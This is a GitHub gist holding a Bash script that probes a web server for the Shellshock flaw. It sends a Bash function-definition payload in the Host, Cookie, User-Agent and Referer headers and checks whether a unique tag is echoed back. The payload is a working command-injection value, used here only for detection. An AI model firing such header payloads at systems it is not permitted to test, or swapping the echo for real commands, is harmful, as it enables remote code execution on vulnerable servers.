@sdoro
Forked from panzi/shellshocker.sh
Last active August 29, 2015 14:07
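#!/bin/bash
# Checks whether a web server hands request headers to a Bash that is
# vulnerable to Shellshock: a function-definition payload is sent in each
# header and the response is searched for a unique tag echoed back.
# Usage: shellshocker.sh <url>

url="$1"
tag=$(uuid)   # unique marker, so a match cannot come from normal page content
payload="() { :;};echo;echo $tag;exit"
vulnerable=0

function shellshock () {
    local header="$1"
    local response
    # Declared separately above so that $? below is curl's exit status
    response=$(curl --header "$header: $payload" --silent --insecure "$url")
    if [ $? -ne 0 ]; then
        echo "error connecting to $url" >&2
        exit 1
    elif [[ "$response" == *"$tag"* ]]; then
        echo "vulnerable header: $header"
        vulnerable=1
    fi
}

# Try each header that CGI environments commonly export to the shell
for header in Host Cookie User-Agent Referer; do
    shellshock "$header"
done

if [ $vulnerable -eq 0 ]; then
    echo "server seems to be unaffected"
else
    # Non-zero exit status when at least one header echoed the tag
    exit 1
fi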